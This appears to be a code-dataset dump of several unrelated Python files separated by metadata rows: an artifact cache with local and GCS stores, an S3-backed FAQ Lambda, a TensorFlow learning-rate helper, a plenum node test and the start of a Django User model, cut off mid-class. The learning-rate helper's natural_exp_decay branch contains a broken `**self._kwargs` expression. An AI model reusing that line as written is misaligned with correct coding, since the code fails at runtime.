Returns a Result for the nearest cached artifact for this query, if one
exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
if entry.tier == "local":
file_path = path_from_url(entry.artifact_url)
elif entry.tier == "cloud":
blob_url = entry.artifact_url
file_path = self._file_from_blob(blob_url)
else:
raise AssertionError("Unrecognized tier: " + entry.tier)
value = self._value_from_file(file_path)
value_hash = self.query.protocol.tokenize_file(file_path)
return Result(
query=self.query,
value=value,
file_path=file_path,
value_hash=value_hash,
)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def load_result_value_hash(self):
"""
Returns only the value hash for the nearest cached artifact for
this query, if one exists.
"""
try:
entry = self._get_nearest_entry_with_artifact()
if entry is None:
return None
return entry.value_hash
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def save_result(self, result):
"""
Saves a Result in each cache layer that doesn't already have an exact
match.
"""
try:
self._save_or_reregister_result(result)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def update_provenance(self):
"""
Adds an entry to each cache layer that doesn't already have an exact
match for this query. There must be already be at least one cached
functional match -- i.e., ``can_load()`` must already return True.
"""
try:
self._save_or_reregister_result(None)
except InternalCacheStateError as e:
self._raise_state_error_with_explanation(e)
def _save_or_reregister_result(self, result):
local_entry = self._get_local_entry()
cloud_entry = self._get_cloud_entry()
self.flush_stored_entries()
if result is not None:
value_wrapper = NullableWrapper(result.value)
file_path = result.file_path
value_hash = result.value_hash
else:
value_wrapper = None
file_path = None
value_hash = None
blob_url = None
if file_path is None:
if local_entry.has_artifact:
file_path = path_from_url(local_entry.artifact_url)
value_hash = local_entry.value_hash
elif value_wrapper is not None:
file_path = self._file_from_value(value_wrapper.value)
value_hash = self.query.protocol.tokenize_file(file_path)
else:
if cloud_entry is None or not cloud_entry.has_artifact:
raise AssertionError(
oneline(
"""
Attempted to register metadata with no result
argument and no previously saved values;
this suggests we called update_provenance() without
previously finding a cached value, which shouldn't
happen."""
)
)
blob_url = cloud_entry.artifact_url
file_path = self._file_from_blob(blob_url)
value_hash = cloud_entry.value_hash
if not local_entry.exactly_matches_query:
file_url = url_from_path(file_path)
local_entry = self._local.inventory.register_url(
self.query, file_url, value_hash,
)
self._stored_local_entry = local_entry
if self._cloud:
assert cloud_entry is not None
if not cloud_entry.exactly_matches_query:
if blob_url is None:
if cloud_entry.has_artifact:
blob_url = cloud_entry.artifact_url
else:
blob_url = self._blob_from_file(file_path)
cloud_entry = self._cloud.inventory.register_url(
self.query, blob_url, value_hash,
)
self._stored_cloud_entry = cloud_entry
def _get_nearest_entry_with_artifact(self):
"""
Returns the "nearest" -- i.e., most local -- cache entry for this
query.
"""
local_entry = self._get_local_entry()
if local_entry.has_artifact:
return local_entry
cloud_entry = self._get_cloud_entry()
if cloud_entry is not None and cloud_entry.has_artifact:
return cloud_entry
return None
def _get_local_entry(self):
if self._stored_local_entry is None:
self._stored_local_entry = self._local.inventory.find_entry(self.query)
return self._stored_local_entry
def _get_cloud_entry(self):
if self._stored_cloud_entry is None:
if self._cloud is None:
return None
self._stored_cloud_entry = self._cloud.inventory.find_entry(self.query)
return self._stored_cloud_entry
def _file_from_blob(self, blob_url):
dir_path = self._local.generate_unique_dir_path(self.query)
filename = path_from_url(blob_url).name
file_path = dir_path / filename
ensure_parent_dir_exists(file_path)
logger.info("Downloading %s from GCS ...", self.query.task_key)
try:
self._cloud.download(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact blob", blob_url, e)
return file_path
def _blob_from_file(self, file_path):
url_prefix = self._cloud.generate_unique_url_prefix(self.query)
blob_url = url_prefix + "/" + file_path.name
logger.info("Uploading %s to GCS ...", self.query.task_key)
try:
self._cloud.upload(file_path, blob_url)
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
return blob_url
def _file_from_value(self, value):
dir_path = self._local.generate_unique_dir_path(self.query)
extension = self.query.protocol.file_extension_for_value(value)
value_filename = self.value_filename_stem + extension
value_path = dir_path / value_filename
ensure_parent_dir_exists(value_path)
try:
self.query.protocol.write(value, value_path)
except Exception as e:
# TODO Should we rename this to just SerializationError?
raise EntitySerializationError(
oneline(
f"""
Value of descriptor {self.query.dnode.to_descriptor()!r}
could not be serialized to disk
"""
)
) from e
return value_path
def _value_from_file(self, file_path):
value_filename = file_path.name
extension = value_filename[len(self.value_filename_stem) :]
try:
return self.query.protocol.read_with_extension(file_path, extension)
except UnsupportedSerializedValueError:
raise
except Exception as e:
raise InternalCacheStateError.from_failure("artifact file", file_path, e)
def _raise_state_error_with_explanation(self, source_exc):
stores = [self._local]
if self._cloud:
stores.append(self._cloud)
inventory_root_urls = " and ".join(store.inventory.root_url for store in stores)
raise InvalidCacheStateError(
oneline(
f"""
Cached data may be in an invalid state; this should be
impossible but could have resulted from either a bug or a
change to the cached files. You should be able to repair
the problem by removing all cached files under
{inventory_root_urls}."""
)
) from source_exc
@attr.s(frozen=True)
class NullableWrapper:
"""
A simple wrapper for a value that might be None. We use this when we want
to distinguish between "we have a value which is None" from "we don't have a
value".
"""
value = attr.ib()
@attr.s(frozen=True)
class InventoryEntry:
"""
Represents a saved artifact tracked by an Inventory; returned by Inventory
to CacheAccessor.
"""
tier = attr.ib()
has_artifact = attr.ib()
artifact_url = attr.ib()
provenance = attr.ib()
exactly_matches_query = attr.ib()
value_hash = attr.ib()
@attr.s(frozen=True)
class MetadataMatch:
"""
Represents a match between a query and a saved artifact. `level` is a string
describing the match level, ranging from "functional" to "exact".
"""
metadata_url = attr.ib()
level = attr.ib()
# TODO Should we merge this with InventoryEntry?
@attr.s(frozen=True)
class ExternalCacheItem:
"""
Represents an inventory entry, but contains data intended to be exposed to users
via the Cache class.
"""
inventory = attr.ib()
abs_artifact_url = attr.ib()
abs_metadata_url = attr.ib()
descriptor = attr.ib()
class Inventory:
"""
Maintains a persistent mapping from Queries to artifact URLs. An Inventory
is backed by a "file system", which could correspond to either a local disk
or a cloud storage service. This file system is used to store
metadata records, each of which describes a Query and an artifact URL that
satisfies it. Metadata records are stored using a hierarchical naming
scheme whose levels correspond to the different levels of Provenance
matching.
"""
def __init__(self, name, tier, filesystem):
self.name = name
self.tier = tier
self._fs = filesystem
self.root_url = filesystem.root_url
def register_url(self, query, url, value_hash):
"""
Records metadata indicating that the provided Query is satisfied
by the provided URL, and returns a corresponding InventoryEntry.
"""
logger.debug(
"In %s inventory for %r, saving artifact URL %s ...",
self.tier,
query,
url,
)
expected_metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = None
if self._fs.exists(expected_metadata_url):
# This shouldn't happen, because the CacheAccessor shouldn't write
# to this inventory if we already have an exact match.
logger.warn(
"In %s cache, attempted to create duplicate entry mapping %r " "to %s",
self.tier,
query,
url,
)
metadata_record = self._load_metadata_if_valid_else_delete(
expected_metadata_url,
)
if metadata_record is None:
metadata_url, metadata_record = self._create_and_write_metadata(
query, url, value_hash,
)
assert metadata_url == expected_metadata_url
logger.debug(
"... in %s inventory for %r, created metadata record at %s",
self.tier,
query,
metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=url,
provenance=metadata_record.provenance,
exactly_matches_query=True,
value_hash=metadata_record.value_hash,
)
def find_entry(self, query):
"""
Returns an InventoryEntry describing the closest match to the provided
Query.
"""
logger.debug("In %s inventory for %r, searching ...", self.tier, query)
n_prior_attempts = 0
while True:
if n_prior_attempts in (10, 100, 1000, 10000, 100000, 1000000):
message = f"""
While searching in the {self.tier} cache for an entry matching
{query!r}, found {n_prior_attempts} invalid metadata files;
either a lot of artifact files were manually deleted,
or there's a bug in the cache code
"""
if n_prior_attempts == 1000000:
raise AssertionError("Giving up: " + oneline(message))
else:
logger.warn(oneline(message))
n_prior_attempts += 1
match = self._find_best_match(query)
if not match:
logger.debug(
"... in %s inventory for %r, found no match", self.tier, query
)
return InventoryEntry(
tier=self.tier,
has_artifact=False,
artifact_url=None,
provenance=None,
exactly_matches_query=False,
value_hash=None,
)
metadata_record = self._load_metadata_if_valid_else_delete(
match.metadata_url
)
if metadata_record is None:
continue
logger.debug(
"... in %s inventory for %r, found %s match at %s",
self.tier,
query,
match.level,
match.metadata_url,
)
return InventoryEntry(
tier=self.tier,
has_artifact=True,
artifact_url=metadata_record.artifact_url,
provenance=metadata_record.provenance,
exactly_matches_query=(match.level == "exact"),
value_hash=metadata_record.value_hash,
)
def list_items(self):
metadata_urls = [
url for url in self._fs.search(self.root_url) if url.endswith(".yaml")
]
for metadata_url in metadata_urls:
metadata_record = self._load_metadata_if_valid_else_delete(metadata_url)
if metadata_record is None:
continue
artifact_url = metadata_record.artifact_url
yield ExternalCacheItem(
inventory=self,
abs_artifact_url=derelativize_url(artifact_url, metadata_url),
abs_metadata_url=metadata_url,
descriptor=metadata_record.descriptor,
)
def delete_url(self, url):
return self._fs.delete(url)
def _find_best_match(self, query):
equivalent_url_prefix = self._equivalent_metadata_url_prefix_for_query(query)
possible_urls = self._fs.search(equivalent_url_prefix)
equivalent_urls = [url for url in possible_urls if url.endswith(".yaml")]
if len(equivalent_urls) == 0:
return None
exact_url = self._exact_metadata_url_for_query(query)
if exact_url in equivalent_urls:
return MetadataMatch(metadata_url=exact_url, level="exact",)
samecode_url_prefix = self._samecode_metadata_url_prefix_for_query(query)
samecode_urls = [
url for url in equivalent_urls if url.startswith(samecode_url_prefix)
]
if len(samecode_urls) > 0:
return MetadataMatch(metadata_url=samecode_urls[0], level="samecode",)
nominal_url_prefix = self._nominal_metadata_url_prefix_for_query(query)
nominal_urls = [
url for url in equivalent_urls if url.startswith(nominal_url_prefix)
]
if len(nominal_urls) > 0:
return MetadataMatch(metadata_url=nominal_urls[0], level="nominal",)
return MetadataMatch(metadata_url=equivalent_urls[0], level="equivalent",)
def _equivalent_metadata_url_prefix_for_query(self, query):
return (
self._fs.root_url
+ "/"
+ valid_filename_from_query(query)
+ "/"
+ query.provenance.functional_hash
)
def _nominal_metadata_url_prefix_for_query(self, query):
minor_version_token = tokenize(query.provenance.code_version_minor)
return (
self._equivalent_metadata_url_prefix_for_query(query)
+ "/"
+ "mv_"
+ minor_version_token
)
def _samecode_metadata_url_prefix_for_query(self, query):
return (
self._nominal_metadata_url_prefix_for_query(query)
+ "/"
+ "bc_"
+ query.provenance.bytecode_hash
)
def _exact_metadata_url_for_query(self, query):
filename = f"metadata_{query.provenance.exact_hash}.yaml"
return self._nominal_metadata_url_prefix_for_query(query) + "/" + filename
def _load_metadata_if_valid_else_delete(self, url):
try:
metadata_yaml = self._fs.read_bytes(url).decode("utf8")
metadata_record = ArtifactMetadataRecord.from_yaml(metadata_yaml, url)
except Exception as e:
raise InternalCacheStateError.from_failure("metadata record", url, e)
if not self._fs.exists(metadata_record.artifact_url):
logger.info(
"Found invalid metadata record at %s, "
"referring to nonexistent artifact at %s; "
"deleting metadata record",
url,
metadata_record.artifact_url,
)
self.delete_url(url)
return None
else:
return metadata_record
def _create_and_write_metadata(self, query, artifact_url, value_hash):
metadata_url = self._exact_metadata_url_for_query(query)
metadata_record = ArtifactMetadataRecord.from_content(
dnode=query.dnode,
artifact_url=artifact_url,
provenance=query.provenance,
metadata_url=metadata_url,
value_hash=value_hash,
)
self._fs.write_bytes(metadata_record.to_yaml().encode("utf8"), metadata_url)
return metadata_url, metadata_record
class LocalStore:
"""
Represents the local disk cache. Provides both an Inventory that manages
artifact (file) URLs, and a method to generate those URLs (for creating
new files).
"""
def __init__(self, root_path_str):
root_path = Path(root_path_str).absolute()
self._artifact_root_path = root_path / "artifacts"
inventory_root_path = root_path / "inventory"
tmp_root_path = root_path / "tmp"
self.inventory = Inventory(
"local disk", "local", LocalFilesystem(inventory_root_path, tmp_root_path)
)
def generate_unique_dir_path(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
path = (
self._artifact_root_path
/ valid_filename_from_query(query)
/ str(uuid4())
)
if not path.exists():
return path
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
directory name; {path} already exists"""
)
)
class GcsCloudStore:
"""
Represents the GCS cloud cache. Provides both an Inventory that manages
artifact (blob) URLs, and a method to generate those URLs (for creating
those blobs).
"""
def __init__(self, url):
self._tool = GcsTool(url)
self.inventory = Inventory(
"GCS", "cloud", GcsFilesystem(self._tool, "/inventory")
)
self._artifact_root_url_prefix = url + "/artifacts"
def generate_unique_url_prefix(self, query):
n_attempts = 0
while True:
# TODO This path can be anything as long as it's unique, so we
# could make it more human-readable.
url_prefix = "/".join(
[
str(self._artifact_root_url_prefix),
valid_filename_from_query(query),
str(uuid4()),
]
)
matching_blobs = self._tool.blobs_matching_url_prefix(url_prefix)
if len(list(matching_blobs)) == 0:
return url_prefix
else:
n_attempts += 1
if n_attempts > 3:
raise AssertionError(
oneline(
f"""
Repeatedly failed to randomly generate a novel
blob name; {self._artifact_root_url_prefix}
already exists"""
)
)
def upload(self, path, url):
# TODO For large individual files, we may still want to use gsutil.
if path.is_dir():
self._tool.gsutil_cp(str(path), url)
else:
assert path.is_file()
self._tool.blob_from_url(url).upload_from_filename(str(path))
def download(self, path, url):
blob = self._tool.blob_from_url(url)
# TODO For large individual files, we may still want to use gsutil.
if not blob.exists():
# `gsutil cp -r gs://A/B X/Y` doesn't work when B contains
# multiple files and Y doesn't exist yet. However, if B == Y, we
# can run `gsutil cp -r gs://A/B X`, which will create Y for us.
assert path.name == blob.name.rsplit("/", 1)[1]
self._tool.gsutil_cp(url, str(path.parent))
else:
blob.download_to_filename(str(path))
class FakeCloudStore(LocalStore):
"""
A mock version of the GcsCloudStore that's actually backed by local files.
Useful for running tests without setting up a GCS connection, which is
slow and requires some configuration.
"""
def __init__(self, root_path_str):
super(FakeCloudStore, self).__init__(root_path_str)
def generate_unique_url_prefix(self, query):
return url_from_path(self.generate_unique_dir_path(query))
def upload(self, path, url):
src_path = path
dst_path = path_from_url(url)
recursively_copy_path(src_path, dst_path)
def download(self, path, url):
src_path = path_from_url(url)
dst_path = path
recursively_copy_path(src_path, dst_path)
class LocalFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to local disk.
"""
def __init__(self, inventory_dir, tmp_dir):
self.root_url = url_from_path(inventory_dir)
self.tmp_root_path = tmp_dir
def exists(self, url):
return path_from_url(url).exists()
def search(self, url_prefix):
path_prefix = path_from_url(url_prefix)
if not path_prefix.is_dir():
return []
return [
url_from_path(path_prefix / sub_path)
for sub_path in path_prefix.glob("**/*")
]
def delete(self, url):
path = path_from_url(url)
if not path.exists():
return False
path.unlink()
return True
def write_bytes(self, content_bytes, url):
path = path_from_url(url)
ensure_parent_dir_exists(path)
ensure_dir_exists(self.tmp_root_path)
working_dir = Path(tempfile.mkdtemp(dir=str(self.tmp_root_path)))
try:
working_path = working_dir / "tmp_file"
working_path.write_bytes(content_bytes)
working_path.rename(path)
finally:
shutil.rmtree(str(working_dir))
def read_bytes(self, url):
return path_from_url(url).read_bytes()
class GcsFilesystem:
"""
Implements a generic "FileSystem" interface for reading/writing small files
to GCS.
"""
def __init__(self, gcs_tool, object_prefix_extension):
self._tool = gcs_tool
self.root_url = self._tool.url + object_prefix_extension
def exists(self, url):
# Checking for "existence" on GCS is slightly complicated. If the URL in
# question corresponds to a single file, we should find an object with a
# matching name. If it corresponds to directory of files, we should find one or
# more objects with a matching prefix (the expected name followed by a slash).
return any(
found_url == url or found_url.startswith(url + "/")
for found_url in self.search(url)
)
def search(self, url_prefix):
return [
self._tool.url_from_object_name(blob.name)
for blob in self._tool.blobs_matching_url_prefix(url_prefix)
]
def delete(self, url):
blob = self._tool.blob_from_url(url)
if blob is None:
return False
blob.delete()
return True
def write_bytes(self, content_bytes, url):
self._tool.blob_from_url(url).upload_from_string(content_bytes)
def read_bytes(self, url):
return self._tool.blob_from_url(url).download_as_string()
class InternalCacheStateError(Exception):
"""
Indicates a problem with the integrity of our cached data. Before this is
surfaced to a user, it should be converted to an InvalidCacheStateError.
"""
@classmethod
def from_failure(cls, artifact_type, location, exc):
return cls(f"Unable to read {artifact_type} {location!r} in cache: {exc}")
class InvalidCacheStateError(Exception):
"""
Indicates that the cache state may have been corrupted.
"""
def valid_filename_from_query(query):
"""
Generates a filename from a query.
This just gets the descriptor string from the query and replaces any
spaces with hyphens. (At the time of writing, descriptors can't contain
spaces, but in the future they will be able to.)
"""
return query.dnode.to_descriptor().replace(" ", "-")
CACHE_SCHEMA_VERSION = 8
class YamlRecordParsingError(Exception):
pass
class ArtifactMetadataRecord:
"""
Describes a persisted artifact. Intended to be stored as a YAML file.
"""
@classmethod
def from_content(cls, dnode, artifact_url, provenance, metadata_url, value_hash):
return cls(
body_dict=dict(
descriptor=dnode.to_descriptor(),
artifact_url=relativize_url(artifact_url, metadata_url),
provenance=provenance.to_dict(),
value_hash=value_hash,
)
)
@classmethod
def from_yaml(cls, yaml_str, metadata_url):
try:
body_dict = yaml.load(yaml_str, Loader=YamlLoader)
except yaml.error.YAMLError as e:
raise YamlRecordParsingError(f"Couldn't parse {cls.__name__}") from e
record = cls(body_dict=body_dict)
record.artifact_url = derelativize_url(record.artifact_url, metadata_url)
return record
def __init__(self, body_dict):
try:
self._dict = body_dict
self.descriptor = self._dict["descriptor"]
self.artifact_url = self._dict["artifact_url"]
self.provenance = Provenance.from_dict(self._dict["provenance"])
self.value_hash = self._dict["value_hash"]
except KeyError as e:
raise YamlRecordParsingError(
f"YAML for ArtifactMetadataRecord was missing field: {e}"
)
def to_yaml(self):
return yaml.dump(
self._dict, default_flow_style=False, encoding=None, Dumper=YamlDumper,
)
def __repr__(self):
return f"ArtifactMetadataRecord({self.descriptor!r})"
class Provenance:
"""
Describes the code and data used to generate (possibly-yet-to-be-computed)
value. Provides a set of hashes that can be used to determine if two
such values are meaningfully different, without actually examining the
values.
Provenances can "match" at several different levels of precision.
1. Functional match: all input data is the same, and all functions involved
in the computation have matching major versions. This is the lowest level
of matching, but it's a sufficient condition to treat two artifacts as
interchangeable. The only purpose of the higher levels is to allow
recursive searches for possible versioning errors, where the user has
changed a function's bytecode but failed to update its version.
2. Nominal match: as above, plus the function that computes this value has
a matching minor version. If two provenances don't nominally match, then
they have different versions, which means this particular descriptor doesn't
have a versioning error (although its dependencies might or might not).
3. "Samecode" match: as above, plus the function that computes this value
has matching bytecode. If two provenances are a nominal match but not
a samecode match, that suggests the user may have made a versioning error
in this descriptor.
4. Exact match: as above, plus all dependencies exactly match. If two
provenances exactly match, then there is no chance of any versioning error
anywhere in this descriptor's dependency tree.
"""
@classmethod
def from_computation(
cls,
code_fingerprint,
case_key,
dep_provenance_digests_by_task_key,
treat_bytecode_as_functional,
can_functionally_change_per_run,
flow_instance_uuid,
):
dep_task_key_provenance_digest_pairs = sorted(
dep_provenance_digests_by_task_key.items()
)
functional_code_dict = dict(
orig_flow_name=code_fingerprint.orig_flow_name,
code_version_major=code_fingerprint.version.major,
cache_schema_version=CACHE_SCHEMA_VERSION,
)
nonfunctional_code_dict = dict(
code_version_minor=code_fingerprint.version.minor,
)
bytecode_hash = code_fingerprint.bytecode_hash
if treat_bytecode_as_functional:
functional_code_dict["bytecode_hash"] = bytecode_hash
else:
nonfunctional_code_dict["bytecode_hash"] = bytecode_hash
# The function's output changes with each run; to reflect that,
# we add the flow uuid to the hash so that it will be different
# each time.
if can_functionally_change_per_run:
functional_code_dict["flow_instance_uuid"] = flow_instance_uuid
full_code_dict = dict(
functional=functional_code_dict,
nonfunctional=nonfunctional_code_dict,
bytecode_hash=bytecode_hash,
)
functional_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.functional_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_list = [
dict(
descriptor=task_key.dnode.to_descriptor(),
hash=provenance_digest.exact_hash,
)
for task_key, provenance_digest in dep_task_key_provenance_digest_pairs
]
exact_deps_hash = hash_simple_obj_to_hex(exact_deps_list)
functional_hash = hash_simple_obj_to_hex(
dict(code=functional_code_dict, deps=functional_deps_list,)
)
exact_hash = hash_simple_obj_to_hex(
dict(code=full_code_dict, deps=exact_deps_list,)
)
return cls(
body_dict=dict(
case_key=dict(case_key),
code=full_code_dict,
functional_deps=functional_deps_list,
functional_hash=functional_hash,
exact_hash=exact_hash,
exact_deps_hash=exact_deps_hash,
)
)
@classmethod
def from_dict(cls, body_dict):
return cls(body_dict=body_dict)
def __init__(self, body_dict=None):
self._dict = body_dict
d = self._dict
self.functional_hash = d["functional_hash"]
self.exact_hash = d["exact_hash"]
self.exact_deps_hash = d["exact_deps_hash"]
self.code_version_major = d["code"]["functional"]["code_version_major"]
self.code_version_minor = d["code"]["nonfunctional"]["code_version_minor"]
self.bytecode_hash = d["code"]["bytecode_hash"]
def to_dict(self):
return self._dict
def __repr__(self):
hash_fn = self.functional_hash[:8]
v_maj = self.code_version_major
v_min = self.code_version_minor
hash_ex = self.exact_hash[:8]
return f"Provenance[{hash_fn}/{v_maj}.{v_min}/{hash_ex}]"
def exactly_matches(self, prov):
return self.exact_hash == prov.exact_hash
def dependencies_exactly_match(self, prov):
return self.exact_deps_hash == prov.exact_deps_hash
| 34.656222
| 88
| 0.623415
| 36,679
| 0.947508
| 654
| 0.016894
| 4,781
| 0.123505
| 0
| 0
| 11,846
| 0.306011
|
af84d23224addc1fdc1ef092243757bb1b97c61d
| 925
|
py
|
Python
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 8
|
2019-12-30T16:37:53.000Z
|
2020-04-09T17:18:14.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | 95
|
2020-02-03T15:13:19.000Z
|
2020-05-05T01:00:16.000Z
|
faq/lambda_function.py
|
david-fisher/320-S20-Track2
|
4bdda4701dac75dafaa09fa68a8502d7c5279502
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import boto3
#Last Updated
#5/3/2020
s3 = boto3.client('s3') #S3 object
def lambda_handler(event, context):
#Initializing the variables
bucket = 't2-bucket-storage'
key = 'FAQ.txt'
#CORS headers
response_headers = {}
response_headers["X-Requested-With"] = "*"
response_headers["Access-Control-Allow-Origin"] = "*"
response_headers["Access-Control-Allow-Headers"] = "Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with'"
response_headers["Access-Control-Allow-Methods"] = "OPTIONS,POST,GET,PUT,DELETE"
#Getting the data from the bucket
data = s3.get_object(Bucket=bucket, Key=key)
jsonData = data['Body'].read() #This will read the faq page for its contents
#Returning the faq content here
return {
'statusCode': 200,
'body': jsonData,
'headers': response_headers,
'isBase64Encoded': False
}
| 30.833333
| 122
| 0.665946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 472
| 0.51027
|
af85b8246d06deab8fbd40d2dd688d0cf7df337f
| 1,582
|
py
|
Python
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 125
|
2019-12-05T02:50:56.000Z
|
2022-02-22T08:03:24.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 4
|
2020-03-18T05:56:22.000Z
|
2020-07-11T11:10:17.000Z
|
easy_rl/utils/learning_rate_utils.py
|
simonoso/EasyRL
|
3d8eb2bf138dd2a0b95f8b3743d15f34cfff0740
|
[
"Apache-2.0"
] | 26
|
2019-12-12T06:25:47.000Z
|
2022-01-19T22:19:41.000Z
|
import tensorflow as tf
class LearningRateStrategy(object):
def __init__(self, init_lr, strategy_spec):
self._type = strategy_spec.pop('type', 'exponential_decay')
self._decay_steps = strategy_spec.pop('decay_steps', 1000)
self._decay_rate = strategy_spec.pop('decay_rate', 0.9)
self._kwargs = strategy_spec
self._init_lr = init_lr
def __call__(self, global_step):
if self._type == 'exponential_decay':
lr = tf.train.exponential_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
elif self._type == 'polynomial_decay':
lr = tf.train.polynomial_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
**self._kwargs)
elif self._type == 'natural_exp_decay':
lr = tf.train.natural_exp_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate**self._kwargs)
elif self._type == 'inverse_time_decay':
lr = tf.train.inverse_time_decay(
learning_rate=self._init_lr,
global_step=global_step,
decay_steps=self._decay_steps,
decay_rate=self._decay_rate,
**self._kwargs)
return lr
| 38.585366
| 67
| 0.591656
| 1,555
| 0.982933
| 0
| 0
| 0
| 0
| 0
| 0
| 126
| 0.079646
|
af8721001b7e64b7b7d1b084ad899f44e8598884
| 2,841
|
py
|
Python
|
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
plenum/test/node_request/test_split_non_3pc_messages_on_batches.py
|
ArtObr/indy-plenum
|
c568eefb0042b3ec3aec84e9241cb1b5df419365
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import pytest
from plenum.test import waits
from plenum.test.helper import sendRandomRequests, waitForSufficientRepliesForRequests, checkReqAck
from plenum.test.pool_transactions.helper import buildPoolClientAndWallet
from stp_core.loop.eventually import eventuallyAll
from stp_core.validators.message_length_validator import MessageLenValidator
from plenum.test.pool_transactions.conftest import looper, client1Connected # noqa
from plenum.test.pool_transactions.conftest import clientAndWallet1, client1, wallet1 # noqa
def test_msg_max_length_check_node_to_node(looper,
txnPoolNodeSet,
client1,
wallet1,
client1Connected,
clientAndWallet2):
"""
Two clients send 2*N requests each at the same time.
N < MSG_LEN_LIMIT but 2*N > MSG_LEN_LIMIT so the requests pass the max
length check for client-node requests but do not pass the check
for node-node requests.
"""
N = 10
# it is an empirical value for N random requests
# it has to be adjusted if the world changed (see pydoc)
max_len_limit = 3000
patch_msg_len_validators(max_len_limit, txnPoolNodeSet)
client2, wallet2 = clientAndWallet2
reqs1 = sendRandomRequests(wallet1, client1, N)
reqs2 = sendRandomRequests(wallet2, client2, N)
check_reqacks(client1, looper, reqs1, txnPoolNodeSet)
check_reqacks(client2, looper, reqs2, txnPoolNodeSet)
waitForSufficientRepliesForRequests(looper, client1, requests=reqs1)
waitForSufficientRepliesForRequests(looper, client2, requests=reqs2)
def patch_msg_len_validators(max_len_limit, txnPoolNodeSet):
for node in txnPoolNodeSet:
assert hasattr(node.nodestack, 'msgLenVal')
assert hasattr(node.nodestack, 'msg_len_val')
node.nodestack.msgLenVal = MessageLenValidator(max_len_limit)
node.nodestack.msg_len_val = MessageLenValidator(max_len_limit)
def check_reqacks(client, looper, reqs, txnPoolNodeSet):
reqack_coros = []
for req in reqs:
reqack_coros.extend([partial(checkReqAck, client, node, req.identifier,
req.reqId, None) for node in txnPoolNodeSet])
timeout = waits.expectedReqAckQuorumTime()
looper.run(eventuallyAll(*reqack_coros, totalTimeout=timeout))
@pytest.fixture(scope="module")
def clientAndWallet2(looper, poolTxnClientData, tdirWithClientPoolTxns):
client, wallet = buildPoolClientAndWallet(poolTxnClientData,
tdirWithClientPoolTxns)
looper.add(client)
looper.run(client.ensureConnectedToNodes())
yield client, wallet
client.stop()
| 38.917808
| 99
| 0.697994
| 0
| 0
| 322
| 0.11334
| 354
| 0.124604
| 0
| 0
| 387
| 0.13622
|
af879e6f69f0e9817c68bf41b7101a7b9761611c
| 2,935
|
py
|
Python
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | 1
|
2019-11-06T22:26:26.000Z
|
2019-11-06T22:26:26.000Z
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | 5
|
2021-03-19T02:49:44.000Z
|
2021-06-10T19:13:00.000Z
|
src/api/models/user.py
|
ThaDeveloper/grind
|
fa90b65d12e6d9b3d658b132874801ecda08c57f
|
[
"MIT"
] | null | null | null |
"""User model module"""
import jwt
from datetime import datetime, timedelta
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
from django.conf import settings
from django.core.validators import RegexValidator
from .base_model import CommonFields
from api.models.user_manager import UserManager
class User(AbstractBaseUser, PermissionsMixin, CommonFields):
"""User model """
USER_TYPE = [
('professional', 'professional'),
('client', 'client')
]
USERNAME_REGEX = '^[a-zA-Z]{5,}$'
first_name = models.CharField(max_length=30, null=False)
last_name = models.CharField(max_length=30, null=False)
email = models.EmailField(unique=True, null=False)
username = models.CharField(
max_length=30,
validators=[
RegexValidator(
regex=USERNAME_REGEX,
message='Username must be 5 or more alphabetic characters',
code='invalid_username')],
unique=True, null=False)
password = models.CharField(max_length=128, null=False)
active = models.BooleanField(default=True)
admin = models.BooleanField(default=False)
staff = models.BooleanField(default=False)
user_type = models.CharField(max_length=20, choices=USER_TYPE, null=False)
date_joined = models.DateTimeField(auto_now_add=True)
last_login = models.DateTimeField(auto_now=True)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username', ]
class Meta:
"""metadata options."""
ordering = ('pk',)
verbose_name = 'User'
def __str__(self):
"""Return object's string representation."""
